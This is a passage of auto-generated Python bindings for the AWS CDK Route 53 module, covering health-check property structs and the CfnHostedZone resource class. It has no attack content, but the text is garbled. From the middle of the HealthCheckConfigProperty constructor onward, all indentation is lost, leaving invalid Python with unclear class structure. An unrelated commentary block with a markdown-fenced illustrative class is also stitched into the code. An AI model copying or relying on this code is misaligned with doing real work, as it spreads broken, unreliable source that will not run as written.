        return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnHealthCheck.HealthCheckTagProperty"]]]], jsii.get(self, "healthCheckTags"))

    @health_check_tags.setter
    def health_check_tags(
        self,
        value: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnHealthCheck.HealthCheckTagProperty"]]]],
    ) -> None:
        jsii.set(self, "healthCheckTags", value)

    @jsii.data_type(
        jsii_type="@aws-cdk/aws-route53.CfnHealthCheck.AlarmIdentifierProperty",
        jsii_struct_bases=[],
        name_mapping={"name": "name", "region": "region"},
    )
    class AlarmIdentifierProperty:
        def __init__(self, *, name: builtins.str, region: builtins.str) -> None:
            '''
            :param name: ``CfnHealthCheck.AlarmIdentifierProperty.Name``.
            :param region: ``CfnHealthCheck.AlarmIdentifierProperty.Region``.

            :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-alarmidentifier.html
            '''
            self._values: typing.Dict[str, typing.Any] = {
                "name": name,
                "region": region,
            }

        @builtins.property
        def name(self) -> builtins.str:
            '''``CfnHealthCheck.AlarmIdentifierProperty.Name``.

            :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-alarmidentifier.html#cfn-route53-healthcheck-alarmidentifier-name
            '''
            result = self._values.get("name")
            assert result is not None, "Required property 'name' is missing"
            return typing.cast(builtins.str, result)

        @builtins.property
        def region(self) -> builtins.str:
            '''``CfnHealthCheck.AlarmIdentifierProperty.Region``.

            :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-alarmidentifier.html#cfn-route53-healthcheck-alarmidentifier-region
            '''
            result = self._values.get("region")
            assert result is not None, "Required property 'region' is missing"
            return typing.cast(builtins.str, result)

        def __eq__(self, rhs: typing.Any) -> builtins.bool:
            return isinstance(rhs, self.__class__) and rhs._values == self._values

        def __ne__(self, rhs: typing.Any) -> builtins.bool:
            return not (rhs == self)

        def __repr__(self) -> str:
            return "AlarmIdentifierProperty(%s)" % ", ".join(
                k + "=" + repr(v) for k, v in self._values.items()
            )

    @jsii.data_type(
        jsii_type="@aws-cdk/aws-route53.CfnHealthCheck.HealthCheckConfigProperty",
        jsii_struct_bases=[],
        name_mapping={
            "type": "type",
            "alarm_identifier": "alarmIdentifier",
            "child_health_checks": "childHealthChecks",
            "enable_sni": "enableSni",
            "failure_threshold": "failureThreshold",
            "fully_qualified_domain_name": "fullyQualifiedDomainName",
            "health_threshold": "healthThreshold",
            "insufficient_data_health_status": "insufficientDataHealthStatus",
            "inverted": "inverted",
            "ip_address": "ipAddress",
            "measure_latency": "measureLatency",
            "port": "port",
            "regions": "regions",
            "request_interval": "requestInterval",
            "resource_path": "resourcePath",
            "search_string": "searchString",
        },
    )
    class HealthCheckConfigProperty:
        def __init__(
            self,
            *,
            type: builtins.str,
            alarm_identifier: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHealthCheck.AlarmIdentifierProperty"]] = None,
            child_health_checks: typing.Optional[typing.Sequence[builtins.str]] = None,
            enable_sni: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
            failure_threshold: typing.Optional[jsii.Number] = None,
            fully_qualified_domain_name: typing.Optional[builtins.str] = None,
            health_threshold: typing.Optional[jsii.Number] = None,
            insufficient_data_health_status: typing.Optional[builtins.str] = None,
            inverted: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
            ip_address: typing.Optional[builtins.str] = None,
            measure_latency: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
            port: typing.Optional[jsii.Number] = None,
            regions: typing.Optional[typing.Sequence[builtins.str]] = None,
            request_interval: typing.Optional[jsii.Number] = None,
            resource_path: typing.Optional[builtins.str] = None,
            search_string: typing.Optional[builtins.str] = None,
        ) -> None:
            '''
            :param type: ``CfnHealthCheck.HealthCheckConfigProperty.Type``.
            :param alarm_identifier: ``CfnHealthCheck.HealthCheckConfigProperty.AlarmIdentifier``.
            :param child_health_checks: ``CfnHealthCheck.HealthCheckConfigProperty.ChildHealthChecks``.
            :param enable_sni: ``CfnHealthCheck.HealthCheckConfigProperty.EnableSNI``.
            :param failure_threshold: ``CfnHealthCheck.HealthCheckConfigProperty.FailureThreshold``.
            :param fully_qualified_domain_name: ``CfnHealthCheck.HealthCheckConfigProperty.FullyQualifiedDomainName``.
            :param health_threshold: ``CfnHealthCheck.HealthCheckConfigProperty.HealthThreshold``.
            :param insufficient_data_health_status: ``CfnHealthCheck.HealthCheckConfigProperty.InsufficientDataHealthStatus``.
            :param inverted: ``CfnHealthCheck.HealthCheckConfigProperty.Inverted``.
            :param ip_address: ``CfnHealthCheck.HealthCheckConfigProperty.IPAddress``.
            :param measure_latency: ``CfnHealthCheck.HealthCheckConfigProperty.MeasureLatency``.
            :param port: ``CfnHealthCheck.HealthCheckConfigProperty.Port``.
            :param regions: ``CfnHealthCheck.HealthCheckConfigProperty.Regions``.
            :param request_interval: ``CfnHealthCheck.HealthCheckConfigProperty.RequestInterval``.
            :param resource_path: ``CfnHealthCheck.HealthCheckConfigProperty.ResourcePath``.
            :param search_string: ``CfnHealthCheck.HealthCheckConfigProperty.SearchString``.

            :link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html
            '''
            self._values: typing.Dict[str, typing.Any] = {
                "type": type,
            }
            if alarm_identifier is not None:
                self._values["alarm_identifier"] = alarm_identifier
            if child_health_checks is not None:
                self._values["child_health_checks"] = child_health_checks
            if enable_sni is not None:
                self._values["enable_sni"] = enable_sni
            if failure_threshold is not None:
                self._values["failure_threshold"] = failure_threshold
if fully_qualified_domain_name is not None:
self._values["fully_qualified_domain_name"] = fully_qualified_domain_name
if health_threshold is not None:
self._values["health_threshold"] = health_threshold
if insufficient_data_health_status is not None:
self._values["insufficient_data_health_status"] = insufficient_data_health_status
if inverted is not None:
self._values["inverted"] = inverted
if ip_address is not None:
self._values["ip_address"] = ip_address
if measure_latency is not None:
self._values["measure_latency"] = measure_latency
if port is not None:
self._values["port"] = port
if regions is not None:
self._values["regions"] = regions
if request_interval is not None:
self._values["request_interval"] = request_interval
if resource_path is not None:
self._values["resource_path"] = resource_path
if search_string is not None:
self._values["search_string"] = search_string
@builtins.property
def type(self) -> builtins.str:
'''``CfnHealthCheck.HealthCheckConfigProperty.Type``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-type
'''
result = self._values.get("type")
assert result is not None, "Required property 'type' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def alarm_identifier(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHealthCheck.AlarmIdentifierProperty"]]:
'''``CfnHealthCheck.HealthCheckConfigProperty.AlarmIdentifier``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-alarmidentifier
'''
result = self._values.get("alarm_identifier")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHealthCheck.AlarmIdentifierProperty"]], result)
@builtins.property
def child_health_checks(self) -> typing.Optional[typing.List[builtins.str]]:
'''``CfnHealthCheck.HealthCheckConfigProperty.ChildHealthChecks``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-childhealthchecks
'''
result = self._values.get("child_health_checks")
return typing.cast(typing.Optional[typing.List[builtins.str]], result)
@builtins.property
def enable_sni(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnHealthCheck.HealthCheckConfigProperty.EnableSNI``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-enablesni
'''
result = self._values.get("enable_sni")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def failure_threshold(self) -> typing.Optional[jsii.Number]:
'''``CfnHealthCheck.HealthCheckConfigProperty.FailureThreshold``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-failurethreshold
'''
result = self._values.get("failure_threshold")
return typing.cast(typing.Optional[jsii.Number], result)
@builtins.property
def fully_qualified_domain_name(self) -> typing.Optional[builtins.str]:
'''``CfnHealthCheck.HealthCheckConfigProperty.FullyQualifiedDomainName``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-fullyqualifieddomainname
'''
result = self._values.get("fully_qualified_domain_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def health_threshold(self) -> typing.Optional[jsii.Number]:
'''``CfnHealthCheck.HealthCheckConfigProperty.HealthThreshold``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-healththreshold
'''
result = self._values.get("health_threshold")
return typing.cast(typing.Optional[jsii.Number], result)
@builtins.property
def insufficient_data_health_status(self) -> typing.Optional[builtins.str]:
'''``CfnHealthCheck.HealthCheckConfigProperty.InsufficientDataHealthStatus``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-insufficientdatahealthstatus
'''
result = self._values.get("insufficient_data_health_status")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def inverted(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnHealthCheck.HealthCheckConfigProperty.Inverted``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-inverted
'''
result = self._values.get("inverted")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def ip_address(self) -> typing.Optional[builtins.str]:
'''``CfnHealthCheck.HealthCheckConfigProperty.IPAddress``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-ipaddress
'''
result = self._values.get("ip_address")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def measure_latency(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnHealthCheck.HealthCheckConfigProperty.MeasureLatency``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-measurelatency
'''
result = self._values.get("measure_latency")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def port(self) -> typing.Optional[jsii.Number]:
'''``CfnHealthCheck.HealthCheckConfigProperty.Port``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-port
'''
result = self._values.get("port")
return typing.cast(typing.Optional[jsii.Number], result)
@builtins.property
def regions(self) -> typing.Optional[typing.List[builtins.str]]:
'''``CfnHealthCheck.HealthCheckConfigProperty.Regions``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-regions
'''
result = self._values.get("regions")
return typing.cast(typing.Optional[typing.List[builtins.str]], result)
@builtins.property
def request_interval(self) -> typing.Optional[jsii.Number]:
'''``CfnHealthCheck.HealthCheckConfigProperty.RequestInterval``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-requestinterval
'''
result = self._values.get("request_interval")
return typing.cast(typing.Optional[jsii.Number], result)
@builtins.property
def resource_path(self) -> typing.Optional[builtins.str]:
'''``CfnHealthCheck.HealthCheckConfigProperty.ResourcePath``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-resourcepath
'''
result = self._values.get("resource_path")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def search_string(self) -> typing.Optional[builtins.str]:
'''``CfnHealthCheck.HealthCheckConfigProperty.SearchString``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-searchstring
'''
result = self._values.get("search_string")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "HealthCheckConfigProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnHealthCheck.HealthCheckTagProperty",
jsii_struct_bases=[],
name_mapping={"key": "key", "value": "value"},
)
class HealthCheckTagProperty:
def __init__(self, *, key: builtins.str, value: builtins.str) -> None:
'''
:param key: ``CfnHealthCheck.HealthCheckTagProperty.Key``.
:param value: ``CfnHealthCheck.HealthCheckTagProperty.Value``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthchecktag.html
'''
self._values: typing.Dict[str, typing.Any] = {
"key": key,
"value": value,
}
@builtins.property
def key(self) -> builtins.str:
'''``CfnHealthCheck.HealthCheckTagProperty.Key``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthchecktag.html#cfn-route53-healthcheck-healthchecktag-key
'''
result = self._values.get("key")
assert result is not None, "Required property 'key' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def value(self) -> builtins.str:
'''``CfnHealthCheck.HealthCheckTagProperty.Value``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthchecktag.html#cfn-route53-healthcheck-healthchecktag-value
'''
result = self._values.get("value")
assert result is not None, "Required property 'value' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "HealthCheckTagProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
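# The generated struct classes above all follow one pattern: a keyword-only
# constructor, optional values stored in ``_values`` only when provided, and
# equality/repr defined over that dict. A minimal stdlib-only sketch of the
# pattern follows; ``TagProperty`` here is illustrative, not part of the CDK API.

```python
import typing


class TagProperty:
    """Minimal mirror of the generated jsii struct pattern (illustrative only)."""

    def __init__(self, *, key: str, value: str, comment: typing.Optional[str] = None) -> None:
        # Required properties are always stored; optional ones only when given,
        # so omitting an optional argument leaves no key behind in _values.
        self._values: typing.Dict[str, typing.Any] = {"key": key, "value": value}
        if comment is not None:
            self._values["comment"] = comment

    @property
    def key(self) -> str:
        # Getters re-read _values and assert presence of required properties.
        result = self._values.get("key")
        assert result is not None, "Required property 'key' is missing"
        return typing.cast(str, result)

    def __eq__(self, rhs: typing.Any) -> bool:
        # Value equality: same class and same backing dict.
        return isinstance(rhs, self.__class__) and rhs._values == self._values

    def __ne__(self, rhs: typing.Any) -> bool:
        return not (rhs == self)

    def __repr__(self) -> str:
        return "TagProperty(%s)" % ", ".join(
            k + "=" + repr(v) for k, v in self._values.items()
        )
```

# Because only provided values are stored, two instances built with the same
# arguments compare equal, while supplying an extra optional argument breaks
# equality even though the required fields match.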
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnHealthCheckProps",
jsii_struct_bases=[],
name_mapping={
"health_check_config": "healthCheckConfig",
"health_check_tags": "healthCheckTags",
},
)
class CfnHealthCheckProps:
def __init__(
self,
*,
health_check_config: typing.Union[CfnHealthCheck.HealthCheckConfigProperty, aws_cdk.core.IResolvable],
health_check_tags: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.Sequence[typing.Union[aws_cdk.core.IResolvable, CfnHealthCheck.HealthCheckTagProperty]]]] = None,
) -> None:
'''Properties for defining an ``AWS::Route53::HealthCheck``.
:param health_check_config: ``AWS::Route53::HealthCheck.HealthCheckConfig``.
:param health_check_tags: ``AWS::Route53::HealthCheck.HealthCheckTags``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-healthcheck.html
'''
self._values: typing.Dict[str, typing.Any] = {
"health_check_config": health_check_config,
}
if health_check_tags is not None:
self._values["health_check_tags"] = health_check_tags
@builtins.property
def health_check_config(
self,
) -> typing.Union[CfnHealthCheck.HealthCheckConfigProperty, aws_cdk.core.IResolvable]:
'''``AWS::Route53::HealthCheck.HealthCheckConfig``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-healthcheck.html#cfn-route53-healthcheck-healthcheckconfig
'''
result = self._values.get("health_check_config")
assert result is not None, "Required property 'health_check_config' is missing"
return typing.cast(typing.Union[CfnHealthCheck.HealthCheckConfigProperty, aws_cdk.core.IResolvable], result)
@builtins.property
def health_check_tags(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, CfnHealthCheck.HealthCheckTagProperty]]]]:
'''``AWS::Route53::HealthCheck.HealthCheckTags``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-healthcheck.html#cfn-route53-healthcheck-healthchecktags
'''
result = self._values.get("health_check_tags")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, CfnHealthCheck.HealthCheckTagProperty]]]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CfnHealthCheckProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.implements(aws_cdk.core.IInspectable)
class CfnHostedZone(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CfnHostedZone",
):
'''A CloudFormation ``AWS::Route53::HostedZone``.
:cloudformationResource: AWS::Route53::HostedZone
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html
'''
def __init__(
self,
scope: aws_cdk.core.Construct,
id: builtins.str,
*,
name: builtins.str,
hosted_zone_config: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.HostedZoneConfigProperty"]] = None,
hosted_zone_tags: typing.Optional[typing.Sequence["CfnHostedZone.HostedZoneTagProperty"]] = None,
query_logging_config: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.QueryLoggingConfigProperty"]] = None,
vpcs: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.Sequence[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.VPCProperty"]]]] = None,
) -> None:
'''Create a new ``AWS::Route53::HostedZone``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param name: ``AWS::Route53::HostedZone.Name``.
:param hosted_zone_config: ``AWS::Route53::HostedZone.HostedZoneConfig``.
:param hosted_zone_tags: ``AWS::Route53::HostedZone.HostedZoneTags``.
:param query_logging_config: ``AWS::Route53::HostedZone.QueryLoggingConfig``.
:param vpcs: ``AWS::Route53::HostedZone.VPCs``.
'''
props = CfnHostedZoneProps(
name=name,
hosted_zone_config=hosted_zone_config,
hosted_zone_tags=hosted_zone_tags,
query_logging_config=query_logging_config,
vpcs=vpcs,
)
jsii.create(CfnHostedZone, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
'''Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
'''
return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The CloudFormation resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrId")
def attr_id(self) -> builtins.str:
'''
:cloudformationAttribute: Id
'''
return typing.cast(builtins.str, jsii.get(self, "attrId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrNameServers")
def attr_name_servers(self) -> typing.List[builtins.str]:
'''
:cloudformationAttribute: NameServers
'''
return typing.cast(typing.List[builtins.str], jsii.get(self, "attrNameServers"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "cfnProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
'''``AWS::Route53::HostedZone.HostedZoneTags``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-hostedzonetags
'''
return typing.cast(aws_cdk.core.TagManager, jsii.get(self, "tags"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="name")
def name(self) -> builtins.str:
'''``AWS::Route53::HostedZone.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-name
'''
return typing.cast(builtins.str, jsii.get(self, "name"))
@name.setter
def name(self, value: builtins.str) -> None:
jsii.set(self, "name", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneConfig")
def hosted_zone_config(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.HostedZoneConfigProperty"]]:
'''``AWS::Route53::HostedZone.HostedZoneConfig``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-hostedzoneconfig
'''
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.HostedZoneConfigProperty"]], jsii.get(self, "hostedZoneConfig"))
@hosted_zone_config.setter
def hosted_zone_config(
self,
value: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.HostedZoneConfigProperty"]],
) -> None:
jsii.set(self, "hostedZoneConfig", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="queryLoggingConfig")
def query_logging_config(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.QueryLoggingConfigProperty"]]:
'''``AWS::Route53::HostedZone.QueryLoggingConfig``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-queryloggingconfig
'''
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.QueryLoggingConfigProperty"]], jsii.get(self, "queryLoggingConfig"))
@query_logging_config.setter
def query_logging_config(
self,
value: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.QueryLoggingConfigProperty"]],
) -> None:
jsii.set(self, "queryLoggingConfig", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="vpcs")
def vpcs(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.VPCProperty"]]]]:
'''``AWS::Route53::HostedZone.VPCs``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-vpcs
'''
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.VPCProperty"]]]], jsii.get(self, "vpcs"))
@vpcs.setter
def vpcs(
self,
value: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.VPCProperty"]]]],
) -> None:
jsii.set(self, "vpcs", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnHostedZone.HostedZoneConfigProperty",
jsii_struct_bases=[],
name_mapping={"comment": "comment"},
)
class HostedZoneConfigProperty:
def __init__(self, *, comment: typing.Optional[builtins.str] = None) -> None:
'''
:param comment: ``CfnHostedZone.HostedZoneConfigProperty.Comment``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-hostedzoneconfig.html
'''
self._values: typing.Dict[str, typing.Any] = {}
if comment is not None:
self._values["comment"] = comment
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''``CfnHostedZone.HostedZoneConfigProperty.Comment``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-hostedzoneconfig.html#cfn-route53-hostedzone-hostedzoneconfig-comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "HostedZoneConfigProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnHostedZone.HostedZoneTagProperty",
jsii_struct_bases=[],
name_mapping={"key": "key", "value": "value"},
)
class HostedZoneTagProperty:
def __init__(self, *, key: builtins.str, value: builtins.str) -> None:
'''
:param key: ``CfnHostedZone.HostedZoneTagProperty.Key``.
:param value: ``CfnHostedZone.HostedZoneTagProperty.Value``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-hostedzonetag.html
'''
self._values: typing.Dict[str, typing.Any] = {
"key": key,
"value": value,
}
@builtins.property
def key(self) -> builtins.str:
'''``CfnHostedZone.HostedZoneTagProperty.Key``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-hostedzonetag.html#cfn-route53-hostedzone-hostedzonetag-key
'''
result = self._values.get("key")
assert result is not None, "Required property 'key' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def value(self) -> builtins.str:
'''``CfnHostedZone.HostedZoneTagProperty.Value``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-hostedzonetag.html#cfn-route53-hostedzone-hostedzonetag-value
'''
result = self._values.get("value")
assert result is not None, "Required property 'value' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "HostedZoneTagProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnHostedZone.QueryLoggingConfigProperty",
jsii_struct_bases=[],
name_mapping={"cloud_watch_logs_log_group_arn": "cloudWatchLogsLogGroupArn"},
)
class QueryLoggingConfigProperty:
def __init__(self, *, cloud_watch_logs_log_group_arn: builtins.str) -> None:
'''
:param cloud_watch_logs_log_group_arn: ``CfnHostedZone.QueryLoggingConfigProperty.CloudWatchLogsLogGroupArn``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-queryloggingconfig.html
'''
self._values: typing.Dict[str, typing.Any] = {
"cloud_watch_logs_log_group_arn": cloud_watch_logs_log_group_arn,
}
@builtins.property
def cloud_watch_logs_log_group_arn(self) -> builtins.str:
'''``CfnHostedZone.QueryLoggingConfigProperty.CloudWatchLogsLogGroupArn``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-queryloggingconfig.html#cfn-route53-hostedzone-queryloggingconfig-cloudwatchlogsloggrouparn
'''
result = self._values.get("cloud_watch_logs_log_group_arn")
assert result is not None, "Required property 'cloud_watch_logs_log_group_arn' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
